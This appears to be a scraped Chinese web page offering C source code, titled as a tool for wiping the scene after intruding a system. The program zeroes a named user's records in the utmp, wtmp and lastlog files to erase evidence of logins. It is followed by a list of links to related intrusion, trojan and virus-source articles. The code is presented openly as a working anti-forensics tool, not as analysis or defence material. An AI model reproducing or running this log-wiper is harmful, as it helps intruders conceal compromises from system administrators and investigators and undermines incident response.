破坏入侵系统后现场的源码
来源:互联网 发布:淘宝联盟返利在哪看 编辑:程序博客网 时间:2024/09/21 08:51
编辑 /etc/utmp, /usr/adm/wtmp and /usr/adm/lastlog.
请使用专门的编辑器
例子:
#include
#include
#include
#include
#include
#include
#include
#include
#define WTMP_NAME "/usr/adm/wtmp"
#define UTMP_NAME "/etc/utmp"
#define LASTLOG_NAME "/usr/adm/lastlog"
int f;
void kill_utmp(who)
char *who;
{
struct utmp utmp_ent;
if ((f=open(UTMP_NAME,O_RDWR))>=0) {
while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 )
if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
bzero((char *)&utmp_ent,sizeof( utmp_ent ));
lseek (f, -(sizeof (utmp_ent)), SEEK_CUR);
write (f, &utmp_ent, sizeof (utmp_ent));
}
close(f);
}
}
void kill_wtmp(who)
char *who;
{
struct utmp utmp_ent;
long pos;
pos = 1L;
if ((f=open(WTMP_NAME,O_RDWR))>=0) {
while(pos != -1L) {
lseek(f,-(long)( (sizeof(struct utmp)) * pos),L_XTND);
if (read (f, &utmp_ent, sizeof (struct utmp))<0) {
pos = -1L;
} else {
if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
bzero((char *)&utmp_ent,sizeof(struct utmp ));
lseek(f,-( (sizeof(struct utmp)) * pos),L_XTND);
write (f, &utmp_ent, sizeof (utmp_ent));
pos = -1L;
} else pos += 1L;
}
}
close(f);
}
}
void kill_lastlog(who)
char *who;
{
struct passwd *pwd;
struct lastlog newll;
if ((pwd=getpwnam(who))!=NULL) {
if ((f=open(LASTLOG_NAME, O_RDWR)) >= 0) {
lseek(f, (long)pwd->uid * sizeof (struct lastlog), 0);
bzero((char *)&newll,sizeof( newll ));
write(f, (char *)&newll, sizeof( newll ));
close(f);
}
} else printf("%s: ?/n",who);
}
main(argc,argv)
int argc;
char *argv[];
{
if (argc==2) {
kill_lastlog(argv[1]);
kill_wtmp(argv[1]);
kill_utmp(argv[1]);
printf("Zap2!/n");
} else
printf("Error./n");
}
- 破坏入侵系统后现场的源码
- 入侵系统后的工作
- 入侵系统后的工作
- 入侵Windows系统后的工作
- 现场纪实—如何入侵基于JSP的网站
- Grub 被破坏后的重新安装.
- 被入侵后的记录
- Linux系统被入侵后处理经历
- 恢复被破坏的系统文件
- Linux系统的LOG日志文件及入侵后日志的清除
- Linux系统的LOG日志文件及入侵后日志的清除
- Linux系统的LOG日志文件及入侵后日志的清除
- 入侵防御系统的发展
- 入侵检测系统的部署
- 入侵检测系统的不足
- 入侵检测系统和入侵防护系统的区别
- 服务器被入侵后的处理
- 操作系统被入侵后的修复过程
- 如何能让ASP木马不被杀之续
- 从编程角度分析传奇木马
- 一种巧妙的删除程序自己的方法
- 如何检测和隔离内存泄漏
- 端午节的由来(本来应该是在昨天写的)
- 破坏入侵系统后现场的源码
- 网桥原理及源代码详解
- Converting Between XML and JSON
- 驱动版Hello World
- IRC攻防手册
- “隐藏虚拟目录”再分析
- 深入挖掘Windows脚本技术
- WM97 NoBodyHears源代码
- Win95.Yildiz源代码